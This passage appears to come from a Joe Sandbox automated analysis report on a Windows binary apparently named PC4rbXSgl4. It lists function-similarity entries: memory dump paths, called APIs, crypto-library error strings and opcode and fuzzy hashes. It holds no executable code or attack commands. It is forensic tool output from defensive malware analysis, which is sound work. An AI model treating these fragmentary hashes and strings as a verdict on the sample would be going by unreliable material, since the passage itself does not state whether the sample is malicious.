                • Instruction Fuzzy Hash: 9E41A0A2A28B8292E7588F94D6403AC3765FB04BC8F584035DA7D877D5EF78D096C340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$_errno_invalid_parameter_noinfomemset
                • String ID:
                • API String ID: 3255005035-0
                • Opcode ID: c381f2f2cc97be33ea48ae9e0f19e2f761e0e5779ca13454b15f02d7857f6b8f
                • Instruction ID: 7433d42b7e6a9ba64b8dac301e0b2483f6a04e80029f6202a36b2f290228c8f6
                • Opcode Fuzzy Hash: c381f2f2cc97be33ea48ae9e0f19e2f761e0e5779ca13454b15f02d7857f6b8f
                • Instruction Fuzzy Hash: FB416A66A19B8292EB58DB59E6403A937B5FB04BC4F144135CA7E877D0EF3DE4A2C300
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$memmove
                • String ID: was called before
                • API String ID: 15630516-2150420595
                • Opcode ID: d4e73a5aeac07a623666490df74cfe958e1124317c6a1cfaa48631eac3e7ad41
                • Instruction ID: a5317fb0dc7acd0a26341488d3bc7182fdfcf921bd252351568978030972516e
                • Opcode Fuzzy Hash: d4e73a5aeac07a623666490df74cfe958e1124317c6a1cfaa48631eac3e7ad41
                • Instruction Fuzzy Hash: CC91A162F24B8586FB10DB74D6403AC2762AB957E8F005731DE7C567E6EF38A184C340
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow
                • String ID: exceeds the maximum of $: additional authenticated data (AAD) cannot be input after data to be encrypted or decrypted$: footer length of $: header length of
                • API String ID: 432778473-2663654317
                • Opcode ID: dc87a9ae9e00b5eb09dca8e8cf4c525225d15c7920e56458db9653b6e155c2c6
                • Instruction ID: 3c2da94df0946f26b4d7159af3f3fe381fb1164d7482794fd07474031a3b5c74
                • Opcode Fuzzy Hash: dc87a9ae9e00b5eb09dca8e8cf4c525225d15c7920e56458db9653b6e155c2c6
                • Instruction Fuzzy Hash: 21719F62B29A4296EB11DB62D9542EEB361FB45BC8F404036CB6D877D6FF2CD909C340
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$memmove
                • String ID: is not a valid key length
                • API String ID: 15630516-2125742942
                • Opcode ID: 5466e96c30f257f14cc2d3733b83eb2cc9a5a36840e37005ccf9e511bb6b62bf
                • Instruction ID: 3294bbdd95298b29c0fb7b912616a5b3f13bc1af936e814681b07bdf39c976da
                • Opcode Fuzzy Hash: 5466e96c30f257f14cc2d3733b83eb2cc9a5a36840e37005ccf9e511bb6b62bf
                • Instruction Fuzzy Hash: 1C71B162F24B4685FB10DBA5E6403AC2371AB457E8F404232DA7C96BD9EF3DE195C380
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: fgetc
                • String ID:
                • API String ID: 2807381905-0
                • Opcode ID: e753ba6b9e98875d194165224c38d002e547872cb52e533535491e2effe78cad
                • Instruction ID: dc845858e68759599d55b6fdcae0b706f4767b799e3c9cf05b54a38280333115
                • Opcode Fuzzy Hash: e753ba6b9e98875d194165224c38d002e547872cb52e533535491e2effe78cad
                • Instruction Fuzzy Hash: 5C914C32F28A819AEB108F65D5903AC37B4FB487A8F541636DA7E97AD4EF38D554C300
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$ExceptionThrowfree
                • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                • API String ID: 3245812352-1331214609
                • Opcode ID: 7d6a9c0d6a6b2d83d7e63deb167212ca25c9f79112630aad070347e4ae4bb3de
                • Instruction ID: 328557e77ed85434f7fb4946e88a1897d23674fd50764861f0aa9db47d707a74
                • Opcode Fuzzy Hash: 7d6a9c0d6a6b2d83d7e63deb167212ca25c9f79112630aad070347e4ae4bb3de
                • Instruction Fuzzy Hash: A7519E62B28A86A2EF50DB19D6442E86361FB44BC4F944432DA3D87BE5EF7DD54BC300
                APIs
                  • Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA
                • memmove.VCRUNTIME140 ref: 00007FF6F18AE598
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE642
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE681
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE6D0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturnmemmove$malloc
                • String ID: " not used$er "
                • API String ID: 104515685-1755945580
                • Opcode ID: bc87fd1883b4d7b253673734ee45bad49037b993acd2705b915a5ecd4608f386
                • Instruction ID: 7a3156f909d0029c2b19aa5955d496f53d823aee8c863f7829b68a01fcf35b79
                • Opcode Fuzzy Hash: bc87fd1883b4d7b253673734ee45bad49037b993acd2705b915a5ecd4608f386
                • Instruction Fuzzy Hash: 3F716062F28B869AEB00DB74D6413AC3361EB99798F409731DABC526D5EF78E190C340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID:
                • API String ID: 2016347663-0
                • Opcode ID: 13262152cef2d685ce502532d0732174b4da82677d670bac0cc5da0e97aa084e
                • Instruction ID: 7342ba2284cc03645d671e5c779ab3bb7a394c7e24f95b1a7d532f9e9f9a6b2e
                • Opcode Fuzzy Hash: 13262152cef2d685ce502532d0732174b4da82677d670bac0cc5da0e97aa084e
                • Instruction Fuzzy Hash: 3C51C122A19B8182EB10EF25E24426E2361FB14BC4F144632DF7C977D5EF79E195D380
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Cpp_error@std@@Mtx_unlockThrow_$Cnd_waitMtx_lockXbad_function_call@std@@
                • String ID:
                • API String ID: 3797061655-0
                • Opcode ID: ce448ce25ec075bdd77bbe3a4ff04929db789a6ce9f7cfffbb7c9b286be97ba5
                • Instruction ID: 0f0f6141c70eabe263a298e98374816f3464a982976661dca914d6511d803c32
                • Opcode Fuzzy Hash: ce448ce25ec075bdd77bbe3a4ff04929db789a6ce9f7cfffbb7c9b286be97ba5
                • Instruction Fuzzy Hash: 03513632629A0592EF54CF21E29063967A5FB84FD4F195136DA6E83BD8EF3CD884C740
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                • String ID:
                • API String ID: 762505753-0
                • Opcode ID: e873d2452dea42ac38c67b0d7febfe25d525863217edc41a1259c3cf3ae6a7a9
                • Instruction ID: 5726041407090399d1d1530240abd9ec054881297b4d97b75608e7a68697b2ff
                • Opcode Fuzzy Hash: e873d2452dea42ac38c67b0d7febfe25d525863217edc41a1259c3cf3ae6a7a9
                • Instruction Fuzzy Hash: D8319032A28B8296EB109F15E5501697760FB88BD4F480632DABD87BE5EF3CE450C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow$free
                • String ID: : this object cannot use a null IV$: this object requires an IV
                • API String ID: 3129652135-991663960
                • Opcode ID: 6a07cca9d71d79757b8d3563f30b47b261b62d0e6939ff6434788403e8642e87
                • Instruction ID: 37aebe3c90882e45347698f665169ffb572d3c0ab7bcdde0bdcff6aa50bdfafa
                • Opcode Fuzzy Hash: 6a07cca9d71d79757b8d3563f30b47b261b62d0e6939ff6434788403e8642e87
                • Instruction Fuzzy Hash: C171A032618B8291DB20CF15E6902AEB761FB89BD4F444132DBAD83BA8EF3CD155C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memset$_errno_invalid_parameter_noinfomemmove
                • String ID:
                • API String ID: 988461243-0
                • Opcode ID: d388a73eacfb0d8efebcfeb8c89fb54283450912c3a4d37f4e97b0b20a4d2332
                • Instruction ID: 631defb16974944dea362d0460127bc43dfc048a506ed31343a93e4e452b3292
                • Opcode Fuzzy Hash: d388a73eacfb0d8efebcfeb8c89fb54283450912c3a4d37f4e97b0b20a4d2332
                • Instruction Fuzzy Hash: 76518076A1464186EB58DF2A964427E7BA2FB89FD0F048135DF3A43B94EF38D451C700
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABD7B
                • memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABD8B
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABDC9
                • memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABDD3
                • memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABDE3
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ABE1C
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID:
                • API String ID: 2016347663-0
                • Opcode ID: 1081af1253ae729aec26d4de59bc4163f6f1e4b1446d731471eb2edd27183fd1
                • Instruction ID: 6d5624ddb74a4ae40d1d34c749ad0e1485d286bf365373fae3d1fdf2c358b4d6
                • Opcode Fuzzy Hash: 1081af1253ae729aec26d4de59bc4163f6f1e4b1446d731471eb2edd27183fd1
                • Instruction Fuzzy Hash: 2541BE62729B41A6EB50AB26E6442AD6361FB48BE0F540731DF7D8BBC5EF3CE4518340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Cpp_error@std@@Throw_$Cnd_signalExceptionMtx_lockMtx_unlockThrow__std_exception_copy
                • String ID:
                • API String ID: 99793096-0
                • Opcode ID: a38fec70a8292ae6589bcd1c9a252a4254410e630b67ce936b01b46defd760ef
                • Instruction ID: 3798e4ed3cfa966e9924d67cab713adb67b3291792fa5ce351e7b15c096f4bb9
                • Opcode Fuzzy Hash: a38fec70a8292ae6589bcd1c9a252a4254410e630b67ce936b01b46defd760ef
                • Instruction Fuzzy Hash: 7C419F22624A4596EB50CF25E9902BD37A4FB49BD8F144135EB6E83BD4EF3CD4C08740
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID:
                • API String ID: 2016347663-0
                • Opcode ID: 2ba23c1be2220e5bdefe784d4f810585cef19c5a89aab65cbad12e159b3cb0d3
                • Instruction ID: f75f6559efa6e8c3eba8e5a9a31d3ad05263db480ab8fd961a26d049dabc30cc
                • Opcode Fuzzy Hash: 2ba23c1be2220e5bdefe784d4f810585cef19c5a89aab65cbad12e159b3cb0d3
                • Instruction Fuzzy Hash: 3641D371B29B8596EF20AB16A6002A9A751EB04BD0F440A31DF7D8B7C5EF7CF0419300
                APIs
                • __std_fs_code_page.MSVCPRT ref: 00007FF6F18A285F
                  • Part of subcall function 00007FF6F18CD2C4: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF6F18A21C6), ref: 00007FF6F18CD2C8
                  • Part of subcall function 00007FF6F18CD2C4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF6F18A21C6), ref: 00007FF6F18CD2D7
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A29DD
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A2A2B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_page
                • String ID: ", "$: "
                • API String ID: 956348032-747220369
                • Opcode ID: 1c32021f7766b0db3a440ab755a33d21fe294151afbe42d702202e4415480f22
                • Instruction ID: 5701f5560d312964e8c708c373aec272fbbaa2bc23f2d0e180625fdc0a8b2bfe
                • Opcode Fuzzy Hash: 1c32021f7766b0db3a440ab755a33d21fe294151afbe42d702202e4415480f22
                • Instruction Fuzzy Hash: 34615972B24B419AEB10DB65D6403AC2362EB48BD8F408526DE7D57BD9EF38D552C380
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow__std_fs_convert_wide_to_narrow$__std_exception_copy__std_fs_code_page_invalid_parameter_noinfo_noreturn
                • String ID: "\
                • API String ID: 1578578930-2226538752
                • Opcode ID: 48f9e33a93e28ea5dae35284aff142529909d3831eb526addcc4aebaa457ff5e
                • Instruction ID: 37edb659eb30d73593488ffe4f9862bb0b91be467e6289a6f2c9a3158d5e7b2e
                • Opcode Fuzzy Hash: 48f9e33a93e28ea5dae35284aff142529909d3831eb526addcc4aebaa457ff5e
                • Instruction Fuzzy Hash: 5E31A322B3878297EB509B65A14026EA651FB847D0F505236FABE83BD5EF7CD481C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
